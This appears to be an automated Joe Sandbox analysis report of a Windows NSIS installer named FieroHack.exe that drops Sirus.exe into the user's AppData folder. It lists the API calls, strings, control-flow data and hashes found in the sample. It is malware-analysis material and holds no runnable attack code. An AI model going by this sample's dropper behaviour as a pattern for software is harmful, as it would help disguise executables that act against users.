401726 SearchPathA 4192->4193 4194 401741 4193->4194 4195 401d1f 4196 402bac 17 API calls 4195->4196 4197 401d26 4196->4197 4198 402bac 17 API calls 4197->4198 4199 401d32 GetDlgItem 4198->4199 4200 402620 4199->4200 4201 402421 4202 402453 4201->4202 4203 402428 4201->4203 4204 402bce 17 API calls 4202->4204 4205 402c0e 17 API calls 4203->4205 4206 40245a 4204->4206 4207 40242f 4205->4207 4212 402c8c 4206->4212 4209 402467 4207->4209 4210 402bce 17 API calls 4207->4210 4211 402440 RegDeleteValueA RegCloseKey 4210->4211 4211->4209 4213 402c98 4212->4213 4214 402c9f 4212->4214 4213->4209 4214->4213 4216 402cd0 4214->4216 4217 405f7d RegOpenKeyExA 4216->4217 4219 402cfe 4217->4219 4218 402da8 4218->4213 4219->4218 4220 402d0e RegEnumValueA 4219->4220 4224 402d31 4219->4224 4221 402d98 RegCloseKey 4220->4221 4220->4224 4221->4218 4222 402d6d RegEnumKeyA 4223 402d76 RegCloseKey 4222->4223 4222->4224 4225 406500 5 API calls 4223->4225 4224->4221 4224->4222 4224->4223 4227 402cd0 6 API calls 4224->4227 4226 402d86 4225->4226 4226->4218 4228 402d8a RegDeleteKeyA 4226->4228 4227->4224 4228->4218 4229 4027a1 4230 402bce 17 API calls 4229->4230 4231 4027a8 FindFirstFileA 4230->4231 4232 4027cb 4231->4232 4236 4027bb 4231->4236 4233 4027d2 4232->4233 4237 406055 wsprintfA 4232->4237 4238 4060f7 lstrcpynA 4233->4238 4237->4233 4238->4236 4239 402626 4240 40262b 4239->4240 4241 40263f 4239->4241 4242 402bac 17 API calls 4240->4242 4243 402bce 17 API calls 4241->4243 4245 402634 4242->4245 4244 402646 lstrlenA 4243->4244 4244->4245 4246 402668 4245->4246 4247 405d37 WriteFile 4245->4247 4247->4246 4248 403ca7 4249 403dfa 4248->4249 4250 403cbf 4248->4250 4252 403e4b 4249->4252 4253 403e0b GetDlgItem GetDlgItem 4249->4253 4250->4249 4251 403ccb 4250->4251 4254 403cd6 SetWindowPos 4251->4254 4255 403ce9 4251->4255 4257 403ea5 4252->4257 4265 401389 2 API calls 4252->4265 4256 40417b 18 API calls 4253->4256 4254->4255 4259 403d06 4255->4259 4260 403cee ShowWindow 4255->4260 4261 
403e35 SetClassLongA 4256->4261 4258 4041c7 SendMessageA 4257->4258 4278 403df5 4257->4278 4287 403eb7 4258->4287 4262 403d28 4259->4262 4263 403d0e DestroyWindow 4259->4263 4260->4259 4264 40140b 2 API calls 4261->4264 4266 403d2d SetWindowLongA 4262->4266 4267 403d3e 4262->4267 4316 404104 4263->4316 4264->4252 4268 403e7d 4265->4268 4266->4278 4271 403db5 4267->4271 4272 403d4a GetDlgItem 4267->4272 4268->4257 4273 403e81 SendMessageA 4268->4273 4269 40140b 2 API calls 4269->4287 4270 404106 DestroyWindow EndDialog 4270->4316 4274 4041e2 8 API calls 4271->4274 4276 403d7a 4272->4276 4277 403d5d SendMessageA IsWindowEnabled 4272->4277 4273->4278 4274->4278 4275 404135 ShowWindow 4275->4278 4280 403d87 4276->4280 4281 403dce SendMessageA 4276->4281 4282 403d9a 4276->4282 4290 403d7f 4276->4290 4277->4276 4277->4278 4279 40618a 17 API calls 4279->4287 4280->4281 4280->4290 4281->4271 4285 403da2 4282->4285 4286 403db7 4282->4286 4283 404154 SendMessageA 4283->4271 4284 40417b 18 API calls 4284->4287 4288 40140b 2 API calls 4285->4288 4289 40140b 2 API calls 4286->4289 4287->4269 4287->4270 4287->4278 4287->4279 4287->4284 4291 40417b 18 API calls 4287->4291 4307 404046 DestroyWindow 4287->4307 4288->4290 4289->4290 4290->4271 4290->4283 4292 403f32 GetDlgItem 4291->4292 4293 403f47 4292->4293 4294 403f4f ShowWindow EnableWindow 4292->4294 4293->4294 4317 40419d EnableWindow 4294->4317 4296 403f79 EnableWindow 4301 403f8d 4296->4301 4297 403f92 GetSystemMenu EnableMenuItem SendMessageA 4298 403fc2 SendMessageA 4297->4298 4297->4301 4298->4301 4300 403c88 18 API calls 4300->4301 4301->4297 4301->4300 4318 4041b0 SendMessageA 4301->4318 4319 4060f7 lstrcpynA 4301->4319 4303 403ff1 lstrlenA 4304 40618a 17 API calls 4303->4304 4305 404002 SetWindowTextA 4304->4305 4306 401389 2 API calls 4305->4306 4306->4287 4308 404060 CreateDialogParamA 4307->4308 4307->4316 4309 404093 4308->4309 4308->4316 4310 40417b 18 API calls 4309->4310 4311 40409e GetDlgItem GetWindowRect 
ScreenToClient SetWindowPos 4310->4311 4312 401389 2 API calls 4311->4312 4313 4040e4 4312->4313 4313->4278 4314 4040ec ShowWindow 4313->4314 4315 4041c7 SendMessageA 4314->4315 4315->4316 4316->4275 4316->4278 4317->4296 4318->4301 4319->4303 4320 40272b 4321 402732 4320->4321 4323 4029aa 4320->4323 4322 402bac 17 API calls 4321->4322 4324 402739 4322->4324 4325 402748 SetFilePointer 4324->4325 4325->4323 4326 402758 4325->4326 4328 406055 wsprintfA 4326->4328 4328->4323 4329 401c2e 4330 402bac 17 API calls 4329->4330 4331 401c35 4330->4331 4332 402bac 17 API calls 4331->4332 4333 401c42 4332->4333 4334 402bce 17 API calls 4333->4334 4338 401c57 4333->4338 4334->4338 4335 401c67 4336 401c72 4335->4336 4337 401cbe 4335->4337 4340 402bac 17 API calls 4336->4340 4341 402bce 17 API calls 4337->4341 4338->4335 4339 402bce 17 API calls 4338->4339 4339->4335 4342 401c77 4340->4342 4343 401cc3 4341->4343 4344 402bac 17 API calls 4342->4344 4345 402bce 17 API calls 4343->4345 4346 401c83 4344->4346 4347 401ccc FindWindowExA 4345->4347 4348 401c90 SendMessageTimeoutA 4346->4348 4349 401cae SendMessageA 4346->4349 4350 401cea 4347->4350 4348->4350 4349->4350 2884 403830 2885 403848 2884->2885 2886 40383a CloseHandle 2884->2886 2891 403875 2885->2891 2886->2885 2892 403883 2891->2892 2893 403888 FreeLibrary GlobalFree 2892->2893 2894 40384d 2892->2894 2893->2893 2893->2894 2895 4058bf 2894->2895 2932 405b7d 2895->2932 2898 4058e7 DeleteFileA 2900 403859 2898->2900 2899 4058fe 2901 405a2c 2899->2901 2947 4060f7 lstrcpynA 2899->2947 2901->2900 2980 40646b FindFirstFileA 2901->2980 2903 405924 2904 405937 2903->2904 2905 40592a lstrcatA 2903->2905 2948 405ad6 lstrlenA 2904->2948 2906 40593d 2905->2906 2909 40594b lstrcatA 2906->2909 2911 405956 lstrlenA FindFirstFileA 2906->2911 2909->2911 2911->2901 2928 40597a 2911->2928 2915 405877 5 API calls 2916 405a66 2915->2916 2917 405a80 2916->2917 2918 405a6a 2916->2918 2920 40521e 24 API calls 2917->2920 2918->2900 2922 40521e 24 API 

                                                    Control-flow Graph

                                                    APIs
                                                    • SetErrorMode.KERNELBASE ref: 0040336D
                                                    • GetVersion.KERNEL32 ref: 00403373
                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033A6
                                                    • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033E2
                                                    • OleInitialize.OLE32(00000000), ref: 004033E9
                                                    • SHGetFileInfoA.SHELL32(00429850,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403405
                                                    • GetCommandLineA.KERNEL32(0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 0040341A
                                                    • CharNextA.USER32(00000000,"C:\Users\user\Desktop\FieroHack.exe",00000020,"C:\Users\user\Desktop\FieroHack.exe",00000000,?,00000007,00000009,0000000B), ref: 00403456
                                                    • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403553
                                                    • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403564
                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403570
                                                    • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403584
                                                    • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040358C
                                                    • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040359D
                                                    • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004035A5
                                                    • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 004035B9
                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                      • Part of subcall function 0040390A: GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FieroHack.exe",00000000), ref: 00403924
                                                      • Part of subcall function 0040390A: lstrlenA.KERNEL32(0042E3C0,?,?,?,0042E3C0,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                      • Part of subcall function 0040390A: lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                      • Part of subcall function 0040390A: GetFileAttributesA.KERNEL32(0042E3C0), ref: 00403A18
                                                      • Part of subcall function 0040390A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403A61
                                                      • Part of subcall function 0040390A: RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                    • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 00403662
                                                      • Part of subcall function 00403830: CloseHandle.KERNEL32(FFFFFFFF,00403667,?,?,00000007,00000009,0000000B), ref: 0040383B
                                                    • OleUninitialize.OLE32(?,?,00000007,00000009,0000000B), ref: 00403667
                                                    • ExitProcess.KERNEL32 ref: 00403688
                                                    • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004037A5
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004037AC
                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037C4
                                                    • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037E3
                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403807
                                                    • ExitProcess.KERNEL32 ref: 0040382A
                                                      • Part of subcall function 00405813: MessageBoxIndirectA.USER32(0040A218), ref: 0040586E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDefaultDeleteDirectoryErrorImageIndirectInfoInitializeLanguageLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeUserValueVersionlstrcmpi
                                                    • String ID: "$"C:\Users\user\Desktop\FieroHack.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming$C:\Users\user\Desktop$C:\Users\user\Desktop\FieroHack.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                    • API String ID: 2959975522-945350059
                                                    • Opcode ID: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                    • Instruction ID: 2464a3ec660faf4d6335bd380e0cd13b62da1685a36c15adf6e00eeeb0483762
                                                    • Opcode Fuzzy Hash: 62ed222f1d320cf1e4846f893a456cfa79d0b37c4e8f3d7f84edf936fdc15b3d
                                                    • Instruction Fuzzy Hash: 49C107705047416AD7216F759D89B2F3EACAB4530AF45443FF181BA2E2CB7C8A058B2F

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                      • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                    • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FieroHack.exe",00000000), ref: 00403924
                                                      • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                    • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FieroHack.exe",00000000), ref: 00403985
                                                    • lstrlenA.KERNEL32(0042E3C0,?,?,?,0042E3C0,00000000,00435400,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,74DF3410), ref: 004039FA
                                                    • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                    • GetFileAttributesA.KERNEL32(0042E3C0), ref: 00403A18
                                                    • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00435400), ref: 00403A61
                                                    • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                    • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                    • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                    • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                    • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                    • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                    • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                    Strings
                                                    Similarity
                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                    • API String ID: 606308-2167519419
                                                    • Opcode ID: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                    • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                    • Opcode Fuzzy Hash: 4865a88281d3660a8db31a6a8141a67bec8b5d5ea2d634c51c2adb987e0e9cb3
                                                    • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                    Control-flow Graph

                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00402EB2
                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\FieroHack.exe,00000400), ref: 00402ECE
                                                      • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00405C94
                                                      • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                    • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FieroHack.exe,C:\Users\user\Desktop\FieroHack.exe,80000000,00000003), ref: 00402F1A
                                                    • GlobalAlloc.KERNEL32(00000040,00000020), ref: 00403050
                                                    Strings
                                                    Similarity
                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FieroHack.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author to obtain a new copy. More information at: http://nsis.sf.net/NSIS_Error$Null$soft
                                                    • API String ID: 2803837635-3992978580
                                                    • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                    • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                    • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                    • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                    Control-flow Graph

                                                    APIs
                                                    • GetSystemDirectoryA.KERNEL32(0042E3C0,00000400), ref: 004062B5
                                                    • GetWindowsDirectoryA.KERNEL32(0042E3C0,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                    • SHGetSpecialFolderLocation.SHELL32(00405256,74DF23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                    • SHGetPathFromIDListA.SHELL32(74DF23A0,0042E3C0), ref: 00406312
                                                    • CoTaskMemFree.OLE32(74DF23A0), ref: 0040631E
                                                    • lstrcatA.KERNEL32(0042E3C0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                    • lstrlenA.KERNEL32(0042E3C0,?,0042A070,00000000,00405256,0042A070,00000000,00000000,004257BA,74DF23A0), ref: 00406394
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406284
                                                    • \Microsoft\Internet Explorer\Quick Launch, xrefs: 0040633C
                                                    Similarity
                                                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                    • API String ID: 717251189-730719616
                                                    • Opcode ID: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                    • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                    • Opcode Fuzzy Hash: cdc54c544b64f6d83ca5da95277fa7ec9e25f9e07b413b0e0ec9f16d5b3b497f
                                                    • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                    Control-flow Graph

                                                    APIs
                                                    • lstrcatA.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\Sirus.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 00401798
                                                    • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\Sirus.exe,C:\Users\user\AppData\Roaming\Sirus.exe,00000000,00000000,C:\Users\user\AppData\Roaming\Sirus.exe,C:\Users\user\AppData\Roaming,00000000,00000000,00000031), ref: 004017C2
                                                      • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,0042EC20,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,004257BA,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,004257BA,74DF23A0), ref: 0040527A
                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                    • String ID: C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\Sirus.exe
                                                    • API String ID: 1941528284-2708655863
                                                    • Opcode ID: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                    • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                    • Opcode Fuzzy Hash: 5509bd2040818d087d1bebcb726dff50be1ad66580b10ce54bc1622c5aeaffaf
                                                    • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                     Control-flow Graph
                                                    control_flow_graph 401 406492-4064b2 GetSystemDirectoryA 402 4064b4 401->402 403 4064b6-4064b8 401->403 402->403 404 4064c8-4064ca 403->404 405 4064ba-4064c2 403->405 407 4064cb-4064fd wsprintfA LoadLibraryExA 404->407 405->404 406 4064c4-4064c6 405->406 406->407
                                                    APIs
                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                    • wsprintfA.USER32 ref: 004064E2
                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                    • String ID: %s%s.dll$UXTHEME$\
                                                    • API String ID: 2200240437-4240819195
                                                    • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                    • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                    • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                    • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                     Control-flow Graph
                                                    control_flow_graph 408 4030d8-4030ec 409 4030f5-4030fe 408->409 410 4030ee 408->410 411 403100 409->411 412 403107-40310c 409->412 410->409 411->412 413 40311c-403129 call 4032ea 412->413 414 40310e-403117 call 403300 412->414 418 4032d8 413->418 419 40312f-403133 413->419 414->413 420 4032da-4032db 418->420 421 403283-403285 419->421 422 403139-403182 GetTickCount 419->422 425 4032e3-4032e7 420->425 423 4032c5-4032c8 421->423 424 403287-40328a 421->424 426 4032e0 422->426 427 403188-403190 422->427 428 4032ca 423->428 429 4032cd-4032d6 call 4032ea 423->429 424->426 430 40328c 424->430 426->425 431 403192 427->431 432 403195-4031a3 call 4032ea 427->432 428->429 429->418 440 4032dd 429->440 434 40328f-403295 430->434 431->432 432->418 442 4031a9-4031b2 432->442 437 403297 434->437 438 403299-4032a7 call 4032ea 434->438 437->438 438->418 446 4032a9-4032b5 call 405d37 438->446 440->426 443 4031b8-4031d8 call 406625 442->443 450 40327b-40327d 443->450 451 4031de-4031f1 GetTickCount 443->451 452 4032b7-4032c1 446->452 453 40327f-403281 446->453 450->420 454 4031f3-4031fb 451->454 455 403236-403238 451->455 452->434 456 4032c3 452->456 453->420 457 403203-403233 MulDiv wsprintfA call 40521e 454->457 458 4031fd-403201 454->458 459 40323a-40323e 455->459 460 40326f-403273 455->460 456->426 457->455 458->455 458->457 463 403240-403247 call 405d37 459->463 464 403255-403260 459->464 460->427 461 403279 460->461 461->426 469 40324c-40324e 463->469 465 403263-403267 464->465 465->443 468 40326d 465->468 468->426 469->453 470 403250-403253 469->470 470->465
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CountTick$wsprintf
                                                    • String ID: ... %d%%
                                                    • API String ID: 551687249-2449383134
                                                    • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                    • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                    • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                    • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                     Control-flow Graph
                                                    control_flow_graph 471 405cbf-405cc9 472 405cca-405cf5 GetTickCount GetTempFileNameA 471->472 473 405d04-405d06 472->473 474 405cf7-405cf9 472->474 476 405cfe-405d01 473->476 474->472 475 405cfb 474->475 475->476
                                                    APIs
                                                    • GetTickCount.KERNEL32 ref: 00405CD3
                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                    Strings
                                                    • "C:\Users\user\Desktop\FieroHack.exe", xrefs: 00405CBF
                                                    • nsa, xrefs: 00405CCA
                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1953376753.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000000.00000002.1953317548.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953407575.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953460385.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1953584809.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_FieroHack.jbxd
                                                    Similarity
                                                    • API ID: CountFileNameTempTick
                                                    • String ID: "C:\Users\user\Desktop\FieroHack.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                    • API String ID: 1716503409-4117351048
                                                    • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
